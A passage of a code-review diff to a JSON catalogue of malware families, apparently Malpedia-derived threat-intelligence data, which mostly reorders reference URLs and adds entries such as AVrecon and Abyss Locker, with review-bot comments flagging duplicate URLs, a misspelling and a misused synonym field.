- "https://blogs.360.cn/post/APT-C-35_target_at_armed_forces_in_Pakistan.html",
- "https://s.tencent.com/research/report/951.html",
- "https://community.riskiq.com/article/6f60db72",
- "https://twitter.com/voodoodahl1/status/1267571622732578816",
- "https://blog.talosintelligence.com/2020/10/donot-firestarter.html",
- "https://cybleinc.com/2021/04/21/donot-team-apt-group-is-back-to-using-old-malicious-patterns/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_005"
 ],
 "synonyms": [],
 "type": []
@@ -2976,10 +3046,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_006",
- "https://twitter.com/ReBensk/status/1438027183490940931",
+ "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749",
 "https://twitter.com/MsftSecIntel/status/1441524497924833282?s=20",
- "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/",
- "https://medium.com/@ThreatMiner/android-trojan-targeting-korean-demographic-using-github-for-c2-8219fc39f749"
+ "https://twitter.com/ReBensk/status/1438027183490940931",
+ "https://blog.cyble.com/2021/09/17/sophisticated-spyware-posing-as-a-banking-application-to-target-korean-users/"
 ],
 "synonyms": [],
 "type": []
@@ -3018,8 +3088,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vajraspy",
- "https://twitter.com/malwrhunterteam/status/1481312752782258176",
 "https://mp.weixin.qq.com/s/B0ElRhbqLzs-wGQh79fTww",
+ "https://twitter.com/malwrhunterteam/status/1481312752782258176",
 "https://twitter.com/LukasStefanko/status/1509451238366236674"
 ],
 "synonyms": [],
@@ -3076,10 +3146,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.vultur",
- "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
 "https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html",
- "https://www.threatfabric.com/blogs/vultur-v-for-vnc.html",
- "https://twitter.com/_icebre4ker_/status/1485651238175846400"
+ "https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud",
+ "https://twitter.com/_icebre4ker_/status/1485651238175846400",
+ "https://www.threatfabric.com/blogs/vultur-v-for-vnc.html"
 ],
 "synonyms": [
 "Vulture"
@@ -3094,8 +3164,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex",
- "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
 "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/",
+ "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/",
 "https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack",
 "https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/"
 ],
@@ -3110,8 +3180,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html"
+ "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html"
 ],
 "synonyms": [],
 "type": []
@@ -3133,13 +3203,26 @@
 "uuid": "40a5d526-ef9f-4ddf-a326-6f33dceeeebc",
 "value": "Wroba"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wyrmspy",
+ "https://www.lookout.com/threat-intelligence/article/wyrmspy-dragonegg-surveillanceware-apt41"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "77f81373-bb3a-449d-82ff-b28fe31acef6",
+ "value": "WyrmSpy"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot",
- "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/",
- "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/"
+ "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/",
+ "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/"
 ],
 "synonyms": [],
 "type": []
@@ -3152,12 +3235,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xenomorph",
+ "https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html",
+ "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html",
+ "https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0",
 "https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html",
 "https://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html",
- "https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html",
- "https://www.threatfabric.com/blogs/bugdrop-new-dropper-bypassing-google-security-measures.html",
- "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5",
- "https://www.zscaler.com/blogs/security-research/rise-banking-trojan-dropper-google-play-0"
+ "https://cryptax.medium.com/unpacking-a-jsonpacker-packed-sample-4038e12119f5"
 ],
 "synonyms": [],
 "type": []
@@ -3219,7 +3302,7 @@
 "value": "YellYouth"
 },
 {
- "description": "",
+ "description": "According to cyware, Zanubis malware pretends to be a malicious PDF application. The threat actor uses it as a key to decrypt responses received from the C2 server.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zanubis",
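Review bot: The new Zanubis description is not parseable as written: "pretends to be a malicious PDF application" says the lure is itself malicious (the point is that it masquerades as a benign PDF app), and "The threat actor uses it as a key to decrypt responses" has no antecedent for "it". A reader cannot tell what value serves as the decryption key, so the second sentence conveys nothing verifiable. Suggest at least `"description": "According to Cyware, Zanubis is Android malware that masquerades as a PDF application."` and either dropping the key sentence or naming the key material it refers to. As with the other descriptions in this cluster, the fix should land in the Malpedia source record if the file is generated.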
@@ -3249,11 +3332,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", - "https://securelist.com/whos-who-in-the-zoo/85394/", "https://securelist.com/whos-who-in-the-zoo/85394", "https://www.secureworks.com/research/threat-profiles/cobalt-juno", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf", - "https://securelist.com/apt-trends-report-q2-2019/91897/" + "https://securelist.com/whos-who-in-the-zoo/85394/", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" ], "synonyms": [], "type": [] @@ -3266,9 +3349,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", - "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", + "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://securelist.com/ztorg-from-rooting-to-sms/78775/", - "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2" + "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1" ], "synonyms": [ "Qysly" 
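Review bot: The reordered ZooPark refs still carry the same Securelist URL twice, `"https://securelist.com/whos-who-in-the-zoo/85394"` and `"https://securelist.com/whos-who-in-the-zoo/85394/"`, differing only in the trailing slash; this commit moves them apart rather than de-duplicating. Since the refs are generated from Malpedia, the generator would ideally normalise trailing slashes (or case and scheme, given the `http://blog.fortinet.com` entry in the neighbouring Ztorg hunk) before emitting the list, so that the reorder-only churn seen across this patch also shrinks. I cannot tell from the hunk whether the generator has such a step; if it does not, adding one is a better fix than hand-editing the JSON.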
@@ -3309,21 +3392,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface", - "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", - "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", - "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", + "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", - "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.youtube.com/watch?v=GjquFKa4afU", "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf", "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", + "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/", - "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/", - "https://www.youtube.com/watch?v=GjquFKa4afU", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", - 
"https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf" + "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" ], "synonyms": [ "HighShell", @@ -3353,10 +3436,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot", - "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/", "https://www.cadosecurity.com/the-continued-evolution-of-abcbot/", - "https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/", - "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/" + "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/", + "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/", + "https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/" ], "synonyms": [], "type": [] @@ -3364,6 +3447,21 @@ "uuid": "8d17175b-4e9f-43a9-851d-898bb6696984", "value": "Abcbot" }, + { + "description": "Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.abyss", + "https://www.bleepingcomputer.com/news/security/linux-version-of-abyss-locker-ransomware-targets-vmware-esxi-servers/" + ], + "synonyms": [ + "elf.hellokitty" + ], + "type": [] + }, + "uuid": "302a96b1-73cb-4f70-a329-e68debd87bf8", + "value": "Abyss Locker" + }, { "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", "meta": { 
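Review bot: The new Abyss Locker entry lists `"elf.hellokitty"` under `synonyms`, but that string is a Malpedia family identifier, not an alias; every other `synonyms` value in this cluster is a human-readable name (e.g. "Qysly", "Gafgyt", "JustForFun"). A galaxy consumer that matches by synonym would therefore tag HelloKitty samples as Abyss Locker, which contradicts the description's own wording that the family is merely "based on" HelloKitty. Suggest removing the synonym and, if a link is wanted, expressing it as a relationship in the way the threat-actor cluster does (`related` entries with an estimative-language tag) rather than as an alias. The closing "Sample seems to be unpacked." is an analyst's working note rather than a description of the family and could be dropped.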
@@ -3384,17 +3482,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.acidrain", - "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/", "https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/", "https://www.techtimes.com/articles/273755/20220331/viasat-hit-russia-s-wiper-malware-called-acidrain-affecting-european.htm", "https://cybersecuritynews.com/acidrain-wiper-malware/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html", "https://www.youtube.com/watch?v=mrTdSdMMgnk", "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", - "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", "https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/" ], "synonyms": [], 
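Review bot: The AcidRain refs on the new side still include the Trustwave overview twice, once with and once without a trailing slash (`.../overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/` and `...-war`); the hunk only reorders them. Duplicate refs are harmless to parsers but inflate the cluster and suggest the import step does not canonicalise URLs before de-duplicating. If the refs are emitted by the Malpedia importer, normalising trailing slashes there would remove this duplicate and the identical one in the ZooPark entry in one change.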
@@ -3409,8 +3507,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker", "https://twitter.com/IntezerLabs/status/1326880812344676352", - "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/" ], "synonyms": [], "type": [] 
@@ -3446,20 +3544,33 @@ "uuid": "e288425b-40f0-441e-977f-5f1264ed61b6", "value": "Aisuru" }, + { + "description": "Ransomware", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.akira", + "https://labs.k7computing.com/index.php/akiras-play-with-linux/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "365081b9-f60d-4484-befa-d4fc9d0f55d7", + "value": "Akira (ELF)" + }, { "description": "Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://www.netscout.com/blog/asert/dropping-anchor", - "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/", "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", - "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", 
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30" ], @@ -3474,8 +3585,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel", - "https://www.secureworks.com/research/threat-profiles/bronze-olive", - "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" + "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-olive" ], "synonyms": [ "Ghost RAT" @@ -3490,12 +3601,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.avoslocker", - "https://blog.lexfo.fr/Avoslocker.html", - "https://www.ic3.gov/Media/News/2022/220318.pdf", - "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html", + "https://www.ic3.gov/Media/News/2022/220318.pdf", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux", + "https://blog.lexfo.fr/Avoslocker.html", + "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen" ], "synonyms": [], 
@@ -3504,6 +3615,22 @@
 "uuid": "465b6a74-87ca-4459-b4be-3f8b272f4485",
 "value": "Avoslocker"
 },
+ {
+ "description": "AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfiguration of the targeted devices. Once deployed, AVreckon will collect some information about the infected device, open a session to pre-configured C&C server, and spawn a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.avrecon",
+ "https://twitter.com/BlackLotusLabs/status/1684290046235484160",
+ "https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/",
+ "https://krebsonsecurity.com/2023/07/who-and-what-is-behind-the-malware-proxy-service-socksescort/",
+ "https://spur.us/2023/07/christmas-in-july-a-finely-wrapped-proxy-service/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1b218432-dd5c-4593-8f37-e202f9418fff",
+ "value": "AVrecon"
+ },
 {
 "description": "Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features ",
 "meta": {
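Review bot: The AVrecon description misspells the family name as "AVreckon" in its third sentence, which will defeat free-text searches for the family name and disagrees with both the `value` and the `elf.avrecon` Malpedia id on the lines above. The same sentence also reads "a session to pre-configured C&C server" (missing article), and "has recently been used" is unanchored in a dataset that will outlive 2023; the Lumen and Krebs references are dated July 2023, so `As of July 2023 the malware has been used in campaigns ...` would keep the claim checkable. Proposed third sentence: `Once deployed, AVrecon collects some information about the infected device, opens a session to a pre-configured C&C server, and spawns a remote shell for command execution.`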
@@ -3535,17 +3662,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", - "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", - "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", - 
"https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/" + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf" ], "synonyms": [], "type": [] @@ -3582,7 +3710,7 @@ "value": "Irc16" }, { - "description": "", + "description": "BADCALL is a Trojan malware variant used by the group Lazarus Group. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.badcall", 
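Review bot: The new BADCALL description ends with a trailing space inside the string literal (`...Lazarus Group. "`) and reads "used by the group Lazarus Group", which repeats the word. Trailing whitespace inside a JSON string is preserved by every parser and will surface in any UI that renders the description, and it will keep reappearing on each regeneration unless the source text is fixed. Suggest `"description": "BADCALL is a Trojan malware variant used by Lazarus Group."`; if there is a Windows BADCALL entry elsewhere in this file, the wording should match it so the two variants are obviously the same family.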
@@ -3599,22 +3727,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", - "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", + "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/", - "https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", - "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", - "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/", - "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", - "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", - "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt" + "https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/", + "https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + 
"https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/", + "https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", + "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", + "https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf" ], "synonyms": [ "Gafgyt", @@ -3647,7 +3779,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bianlian", "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/" + "https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/" ], "synonyms": [], "type": [] 
@@ -3660,10 +3793,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost", - "https://twitter.com/strinsert1Na/status/1595553530579890176", "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/", "https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/", - "https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/" + "https://twitter.com/strinsert1Na/status/1595553530579890176" ], "synonyms": [ "elf.bifrose" @@ -3704,10 +3837,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackbasta", - "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", + "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview", "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview" + "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html" ], "synonyms": [], "type": [] 
@@ -3720,30 +3853,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat", + "https://blog.group-ib.com/blackcat", + "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", + "https://twitter.com/sisoma2/status/1473243875158499330", + "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", + "https://killingthebear.jorgetesta.tech/actors/alphv", + "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", + "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/", + "https://securelist.com/new-ransomware-trends-in-2022/106457/", + "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", + "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/", + "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", + "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/", + "https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html", + "https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/", + "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + 